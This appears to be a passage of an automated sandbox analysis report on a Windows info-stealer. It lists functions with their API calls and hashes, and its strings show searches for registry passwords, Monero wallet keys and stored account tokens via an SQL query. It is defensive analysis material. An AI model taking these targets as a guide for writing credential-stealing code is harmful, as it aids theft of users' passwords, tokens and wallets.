                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: e6a14ae941e78c0095bc2a396b6636ca5ae8fcf33f6e137f0f7a74687c628a58
                          • Instruction ID: dd8e71af95cbd4c2e936dd748229da40106144fff3cab99cc074df9bb9b79fde
                          • Opcode Fuzzy Hash: e6a14ae941e78c0095bc2a396b6636ca5ae8fcf33f6e137f0f7a74687c628a58
                          • Instruction Fuzzy Hash: A95161B1900208AFDB20DF51DC49FEE77B8EB44705F1040A9E609A71C0DB746A89DF56
                          Function 00CB72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00CB733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CB73B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CB740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00CB7452
                          • HeapFree.KERNEL32(00000000), ref: 00CB7459
                          • task.LIBCPMTD ref: 00CB7555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: 608dbe2ecdbd961af392f03cbebc2f2305647f0c96bca44bd860344c7334b8d9
                          • Instruction ID: 432f6d74dbff0d727a79399486a456140d2b5d38189e7072799e94d866058f66
                          • Opcode Fuzzy Hash: 608dbe2ecdbd961af392f03cbebc2f2305647f0c96bca44bd860344c7334b8d9
                          • Instruction Fuzzy Hash: 69613BB59041689BDB24DF50DC45BD9B7BCBF44340F0081E9E649A6141DFB06BC9DFA1
                          Function 00CBBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                          • lstrlen.KERNEL32(00000000), ref: 00CBBC9F
                            • Part of subcall function 00CC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CC8E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00CBBCCD
                          • lstrlen.KERNEL32(00000000), ref: 00CBBDA5
                          • lstrlen.KERNEL32(00000000), ref: 00CBBDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: 3e93e44e32e03a45424aeea7e60c53ff9ff047981e97f833fcfd21d222e6f682
                          • Instruction ID: 2327d980b64e228c44c7c5aa36d6b61b24d0f9724f0b8f14a5ed0ddb43d21bc3
                          • Opcode Fuzzy Hash: 3e93e44e32e03a45424aeea7e60c53ff9ff047981e97f833fcfd21d222e6f682
                          • Instruction Fuzzy Hash: 2CB12C7191010CABDB14FBA0DD9AFEE7338AF54304F44416DF506A61A1EF346E49DBA2
                          Function 00CC6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: 1996c522e0aab79726539ac115c653da8e4446b9d9d39c9cad52708edc79b5ae
                          • Instruction ID: 8740dd756725a399766b2f7df469db4a4d9bd51c6eba78a175d553081c590be4
                          • Opcode Fuzzy Hash: 1996c522e0aab79726539ac115c653da8e4446b9d9d39c9cad52708edc79b5ae
                          • Instruction Fuzzy Hash: 86F03A70904209EFD344AFE2E909F3C7BB0FB45702F0801AAE609AA2D0D6705B41DBD6
                          Function 00CB4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CB4FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CB4FD1
                          • InternetOpenA.WININET(00CD0DDF,00000000,00000000,00000000,00000000), ref: 00CB4FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00CB5011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00CB5041
                          • InternetCloseHandle.WININET(?), ref: 00CB50B9
                          • InternetCloseHandle.WININET(?), ref: 00CB50C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 54cbb90657f0a5fe97106b835d5a40fd6e7b8c5d2d88650822785420e51941dd
                          • Instruction ID: cc19a2d04fc09a36a9b90ecaea6ec2ea8ac06feaaa7c5a107839a16c2f532818
                          • Opcode Fuzzy Hash: 54cbb90657f0a5fe97106b835d5a40fd6e7b8c5d2d88650822785420e51941dd
                          • Instruction Fuzzy Hash: F431E6F4A40218ABDB20DF55DC85BECB7B4EB48704F1081E9EA09B7281D7706A85CF99
                          Function 00CC83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CC8426
                          • wsprintfA.USER32 ref: 00CC8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00CC847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC8499
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                          • RegQueryValueExA.ADVAPI32(00000000,0189E228,00000000,000F003F,?,00000400), ref: 00CC84EC
                          • lstrlen.KERNEL32(?), ref: 00CC8501
                          • RegQueryValueExA.ADVAPI32(00000000,0189E240,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00CD0B34), ref: 00CC8599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC8608
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: c787b7b6a08e32b322afd57f22eb8746890d8ae9dcb587bbb9b5a103134e1b8d
                          • Instruction ID: e155efad491be5256a33f9de10672484a87480dce7293b578c0a034cf277ab5a
                          • Opcode Fuzzy Hash: c787b7b6a08e32b322afd57f22eb8746890d8ae9dcb587bbb9b5a103134e1b8d
                          • Instruction Fuzzy Hash: A421EAB191021CAFDB24DB54DC85FE9B3B8FB48704F04C5A9E609A6180DF716A85CFD4
                          Function 00CC7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC76A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC76AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0188BD08,00000000,00020119,00000000), ref: 00CC76DD
                          • RegQueryValueExA.ADVAPI32(00000000,0189E180,00000000,00000000,?,000000FF), ref: 00CC76FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC7708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: fd4d995eccb5f7febc0438f4e63721bae5839003d18f5bab0f75f9886988ac1b
                          • Instruction ID: 4b81ad294bfe91982021bec73afa36f379f22b3641244d6a51c758f1099f28df
                          • Opcode Fuzzy Hash: fd4d995eccb5f7febc0438f4e63721bae5839003d18f5bab0f75f9886988ac1b
                          • Instruction Fuzzy Hash: 820121F5A04208BFDB00DBA5DC4DF79B7B8EB88701F144169FA08EB290E6B09904CF51
                          Function 00CC7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0188BD08,00000000,00020119,00CC76B9), ref: 00CC775B
                          • RegQueryValueExA.ADVAPI32(00CC76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00CC777A
                          • RegCloseKey.ADVAPI32(00CC76B9), ref: 00CC7784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: bed0ff1e996b4f7af1a7050402c47b3022889089b75e27dc943b8ce4f8ccae9b
                          • Instruction ID: 48a78e34300c836708ac4106016e4967e00ad945b711bb6f9e345628d0cdd0dd
                          • Opcode Fuzzy Hash: bed0ff1e996b4f7af1a7050402c47b3022889089b75e27dc943b8ce4f8ccae9b
                          • Instruction Fuzzy Hash: A60121F5A40208BFD710DBE5DC4AFBEB7B8EB88700F104169FA09AB281D6B06604CB51
                          Function 00CB99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                          • LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 5e7f1e8b176968bb835f52168a53cb430752372c4dcfb7789ac01f9e3ece3a45
                          • Instruction ID: 2ace9821d659c722d9419afc8cd1bcb006ea11d3c8910edb18f6a2922f617f78
                          • Opcode Fuzzy Hash: 5e7f1e8b176968bb835f52168a53cb430752372c4dcfb7789ac01f9e3ece3a45
                          • Instruction Fuzzy Hash: 31312CB4A00209EFDB14CF95C885FEE77B5FF88740F108158E915AB290D778AA45DFA1
                          Function 00CC4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,0189E390), ref: 00CC47DB
                            • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4801
                          • lstrcat.KERNEL32(?,?), ref: 00CC4820
                          • lstrcat.KERNEL32(?,?), ref: 00CC4834
                          • lstrcat.KERNEL32(?,0188B860), ref: 00CC4847
                          • lstrcat.KERNEL32(?,?), ref: 00CC485B
                          • lstrcat.KERNEL32(?,0189D648), ref: 00CC486F
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CC8D90: GetFileAttributesA.KERNEL32(00000000,?,00CB1B54,?,?,00CD564C,?,?,00CD0E1F), ref: 00CC8D9F
                            • Part of subcall function 00CC4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CC4580
                            • Part of subcall function 00CC4570: RtlAllocateHeap.NTDLL(00000000), ref: 00CC4587
                            • Part of subcall function 00CC4570: wsprintfA.USER32 ref: 00CC45A6
                            • Part of subcall function 00CC4570: FindFirstFileA.KERNEL32(?,?), ref: 00CC45BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
